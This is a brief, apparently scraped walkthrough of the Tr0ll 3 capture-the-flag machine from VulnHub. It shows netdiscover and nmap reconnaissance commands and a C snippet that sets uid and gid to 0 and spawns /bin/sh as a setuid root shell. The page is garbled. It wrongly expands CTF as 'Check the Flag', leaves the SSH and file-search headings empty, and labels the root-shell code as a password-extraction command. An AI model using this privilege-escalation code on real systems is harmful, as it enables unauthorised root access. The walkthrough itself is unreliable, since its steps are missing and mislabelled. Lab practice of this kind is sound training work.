Open In App

Tr0ll 3 Walkthrough of Check the Flag or CTF Problem

The CTF or Check the Flag problem is posted on vulnhub.com. VulnHub is a platform which provides vulnerable applications/machines to gain practical hands-on experience in the field of information security. Tr0ll 3 is a machine on vulnhub. To Download visit:
Troll 3 Machine – Vulnhub Below are the steps for the Vulnhub – Tr0ll 3 Walk-through:

Find Host Inside the Network

netdiscover -i eth0 -r 10.0.2.0/16  

Scan the Target with nmap

nmap -p- -A -O -T 4 IP_address

SSH Login

Finding the files that we can access

Command to extract the Password

int main(void) {
setgid(0); setuid(0);
execl("/bin/sh", "sh", 0);
}
Article Tags :